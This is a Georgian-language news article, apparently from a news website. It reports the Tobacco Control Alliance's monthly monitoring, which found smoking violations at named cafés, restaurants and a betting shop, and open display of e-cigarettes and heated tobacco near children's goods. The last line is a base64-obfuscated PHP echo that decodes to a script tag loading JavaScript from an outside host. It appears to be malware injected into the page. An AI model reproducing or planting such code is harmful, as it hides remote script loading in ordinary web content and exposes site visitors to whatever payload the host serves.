celsiusi
ავერსი საქკაბელი
„თამბაქოს კონტროლის ალიანსი“ ყოველთვიური მონიტორინგის შედეგებს აქვეყნებს.
როგორც „თამბაქოს კონტროლის ალიანსში“ აცხადებენ, თამბაქოს მოხმარებაზე რეგულაციების აღსრულების მონიტორინგი მთელი ქვეყნის მასშტაბით თანაბრად ტარდება.
„ჯანმრთელობის ხელშეწყობის სახელმწიფო პროგრამის ფარგლებში, თამბაქოს მოხმარების კონტროლის გაძლიერების მიზნით მორიგი, ყოველთვიური მონიტორინგის შედეგად არასახარბიელო სურათი გამოიკვეთა.
მონიტორინგის საანგარიშო პერიოდში მოწევის რეგულაციის დარღვევის ფაქტების შესახებ  112-ის მობილური აპლიკაციით ეცნობა საპატრულო პოლიციას, რის შემდეგაც დამრღვევები დაჯარიმდნენ. კერძოდ, მცხეთის რაიონის სოფელ ნატახტარში, რესტორანში „ნატახტრის ველი“ დახურულ სივრცეში სიგარეტს ეწეოდნენ.  ახალქალაქში, ჭავჭავაძის #3-ში მდებარე ტოტალიზატორში „ბეთსიტი“ ასევე ეწეოდნენ სიგარეტს და შიდა სივრცეში გამოდებული იყო საფერფლეებიც, რაც, თავის მხრივ, მოწევის რეგულაციის დარღვევაა.
მარნეულში, ცენტრალურ მოედანზე, ყოფილი „დომბიტას“ შენობაში მდებარე კაფეშიც შიდა სივრცეში იდო საფერფლეები და ასევე ეწეოდნენ სიგარეტს. მოწევის რეგულაციის დარღვევები დაფიქსირდა იმავე შენობაში განთავსებულ სილამაზის სალონში და საჩაიეში.
თბილისში, სულხან ცინცაძის #5-ში მდებარე კაფე „მასკიში“ ჩილიმს ეწეოდნენ. აღსანიშნავია, რომ „მასკიში“ მოწევის რეგულაციის დარღვევის ფაქტი პირველად არ დაფიქსირებულა.
შევახსენებთ ე.წ. სამასპინძლო ბიზნესში რეგიონებში დასაქმებულებს, რომ თამბაქოს კონტროლის მონიტორინგი არამხოლოდ თბილისში ტარდება და, შესაბამისად, არამხოლოდ დედაქალაქში ფიქსირდება რეგულაციების დარღვევის ფაქტები.
იმავეს ვამბობთ, თამბაქოს პროდუქტებით ვაჭრობის რეგულაციის დარღვევასთან დაკავშირებით. კანონი მთელი საქართველოს მასშტაბით ერთნაირად მოქმედებს და მონიტორინგიც ერთნაირად ეხება. ვაჭრობის რეგულაციების დარღვევები ძირითადად სავაჭრო ობიექტის შიგნით თამბაქოს პროდუქტების ხილულად განთავსების წესთან დაკავშირებულია. შემოწმებული სავაჭრო ობიექტების 13%-ში ხილულად იყიდება თამბაქოს ახალი პროდუქტები, ელსიგარეტი და გასახურებელი თამბაქო. ჩვეულებრივი სიგარეტი დახურულ თაროებზეა, თუმცა თამბაქოს ახალი პროდუქტები, ძირითადად, ტკბილეულთან, საბავშვო და სხვა სახის პროდუქტებთან ერთად, საერთო დახლზე, სტენდზე ან სალაროსთანაა გამოფენილი“,- აცხადებენ „თამბაქოს კონტროლის ალიანსში“.
მათივე ცნობით, თვალშისაცემად გაზრდილია ობიექტის გარედან თამბაქოს პროდუქტების ხილვადობის ფაქტები.
„ხილულად იყიდება ელექტრონული სიგარეტი და გასახურებელი თამბაქო. სამწუხაროდ, შეიძლება ითქვას, რომ რატომღაც სავაჭრო ობიექტებში დაივიწყეს ან ვინმემ დაარწმუნა, რომ თამბაქოს კონტროლის კანონის რეგულაციები თამბაქოს ახალ პროდუქტებთან დაკავშირებით არ ვრცელდება. ნუ დაიჯერებთ ცრუ შეგონებებს და დაიცავით რეგულაციები თამბაქოს ნებისმიერ პროდუქტთან დაკავშირებით“, – აცხადებენ „თამბაქოს კონტროლის ალიანსში“.
496
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");